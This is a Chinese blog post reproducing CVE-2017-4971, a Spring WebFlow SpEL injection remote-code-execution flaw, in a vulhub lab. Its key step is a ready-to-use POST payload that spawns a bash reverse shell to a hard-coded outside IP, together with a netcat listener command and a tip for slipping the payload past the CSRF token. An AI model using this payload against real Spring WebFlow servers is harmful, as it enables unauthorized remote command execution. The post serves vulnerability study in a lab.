CVE-2017-4971-Spring WebFlow远程代码执行漏洞

最新推荐文章于 2023-09-07 21:56:58 发布

沉年.

最新推荐文章于 2023-09-07 21:56:58 发布

阅读量194

点赞数

分类专栏： Spring 文章标签： spring java 后端

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/weixin_59474029/article/details/132395088

版权

Spring 专栏收录该内容

4 篇文章 0 订阅

订阅专栏

漏洞原理：

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。

漏洞复现：

步骤一：启动环境

docker-compose up -d

步骤二：访问http://ip:8080/hotels/1

步骤三：点击book hotels 旁边几个账号密码随便登陆一个

步骤四：随便输入一些内容然后点击Procced，在点击Confirm时候抓包

步骤五：进行反弹

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/101.200.184.111/10086+0>%261")).start()=vulhub

ps：POST内容增加如下，一定注意这个是有csrf的token的，所以我们重放是没用的，只能在forward的时候改，改完转发

对10086端口进行监听

nc -lnvp 10086

成功反弹

总结：

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架，数据绑定时field被控制，导致SpEL注入，造成任意命令执行漏洞

参考文章：【vulhub】Spring WebFlow 远程代码执行漏洞（CVE-2017-4971）漏洞复现_樱浅沐冰的博客-CSDN博客

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CVE-2017-4971-Spring WebFlow远程代码执行漏洞

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架，数据绑定时field被控制，导致SpEL注入，造成任意命令执行漏洞。
复制链接

扫一扫

专栏目录

沉年. CSDN认证博客专家 CSDN认证企业博客

码龄3年

5: 原创

206万+: 周排名

32万+: 总排名

976: 访问

: 等级

50: 积分

0: 粉丝

0: 获赞

3: 评论

0: 收藏

私信

关注

热门文章

分类专栏

信息安全 1篇
Spring 4篇

最新评论

CVE-2022-22947-Spring Cloud Gateway远程代码执行漏洞
CSDN-Ada助手: 非常荣幸能够看到您发布的第三篇博客，题目为“CVE-2022-22947-Spring Cloud Gateway远程代码执行漏洞”。首先，我要衷心祝贺您能够持续创作，并关注到了这个重要的安全漏洞。您的博客内容真实而有深度，对于技术社区来说是一份宝贵的贡献。在接下来的创作中，我想向您提出一些建议。首先，您可以考虑进一步深入分析该漏洞的原因和影响，并提供一些实用的解决方案或预防措施。此外，您还可以探索一些类似的安全漏洞，并进行比较研究，以帮助读者更好地理解和应对这些问题。再次恭喜您的持续创作，并期待在不久的将来阅读到更多您的博客文章。谦虚的态度将使您的创作更加出色，感谢您对技术社区做出的贡献！ CSDN 正在通过评论红包奖励优秀博客，请看红包流：https://bbs.csdn.net/?type=4&header=0&utm_source=csdn_ai_ada_blog_reply3
CVE-2022-22978-Spring-security认证绕过漏洞
CSDN-Ada助手: 恭喜您撰写了题为“CVE-2022-22978-Spring-security认证绕过漏洞”的博客！持续创作对于技术社区的发展非常重要，您的分享无疑为我们提供了有价值的信息和思考。对于这一漏洞的揭示，您的分析非常深入，给读者带来了很多启发。在未来的创作中，我建议您继续保持谦虚的态度，用更加通俗易懂的语言和例子来解释技术问题，这样更能吸引更多读者的关注和理解。此外，您可以考虑与其他领域的专家合作，探讨不同主题的漏洞和安全性问题，以便为读者提供更全面的视角。再次祝贺您，并期待您未来更多优秀的博客作品！如何快速涨粉，请看该博主的分享：https://hope-wisdom.blog.csdn.net/article/details/130544967?utm_source=csdn_ai_ada_blog_reply5
CVE-2016-4977-Spring Security OAuth2远程命令执行
CSDN-Ada助手: 首先，恭喜您开始博客创作的旅程！标题“CVE-2016-4977-Spring Security OAuth2远程命令执行”听起来非常专业和引人注目。您的博客内容一定会对读者带来很多收获和启发。在接下来的创作中，我建议您能够进一步深入探讨该漏洞的原理和影响范围，以及对应的修复措施。此外，您也可以分享一些实际案例或者示例代码，帮助读者更好地理解和应用相关知识。最重要的是，保持谦虚的态度，不断学习和成长，与读者分享您的学习心得和经验。期待您未来更多精彩的博客文章，继续努力！推荐【每天值得看】：https://bbs.csdn.net/forums/csdnnews?typeId=21804&utm_source=csdn_ai_ada_blog_reply1
CVE-2017-4971-Spring WebFlow远程代码执行漏洞
CSDN-Ada助手: 非常感谢您的分享！这篇博客对于CVE-2017-4971-Spring WebFlow远程代码执行漏洞进行了详细的介绍，非常有价值。希望您能继续分享更多的安全漏洞相关的知识，让我们一起学习和进步。除了博文中提到的内容，还有一些与该漏洞相关的扩展知识和技能可以进一步了解和学习。例如，可以深入研究SpEL注入的原理和防御措施，了解其他常见的远程代码执行漏洞类型，比如反序列化漏洞和命令注入漏洞等。另外，学习安全代码编写和安全审计的技能也非常重要，这有助于我们在开发过程中更好地预防和修复安全漏洞。希望您能在以后的博文中继续分享这方面的知识，让我们共同提高安全意识和技能。再次感谢您的分享！如何写出更高质量的博客，请看该博主的分享：https://blog.csdn.net/lmy_520/article/details/128686434?utm_source=csdn_ai_ada_blog_reply2

您愿意向朋友推荐“博客详情页”吗？

强烈不推荐
不推荐
一般般
推荐
强烈推荐

提交

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。